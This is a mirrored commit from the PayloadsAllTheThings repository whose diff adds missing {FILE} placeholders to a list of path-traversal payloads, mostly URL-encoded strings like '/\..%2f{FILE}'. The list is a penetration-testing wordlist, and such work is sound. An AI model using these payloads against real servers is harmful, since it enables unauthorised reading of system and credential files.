mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 00:44:04 +01:00
Fixed missing {FILE} placeholders
The bottom few options were missing the {FILE} placeholders.
This fixes them.
This commit is contained in:
parent
d49faf9874
commit
3359054ecf
1 changed files with 7 additions and 7 deletions
|
|
@ -877,11 +877,11 @@
|
||||||
/..\..\\..\..\\..\..\\\{FILE}
|
/..\..\\..\..\\..\..\\\{FILE}
|
||||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
||||||
/\..%2f
|
/\..%2f{FILE}
|
||||||
/\..%2f\..%2f
|
/\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f
|
/\..%2f\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f\..%2f
|
/\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f\..%2f\..%2f
|
/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue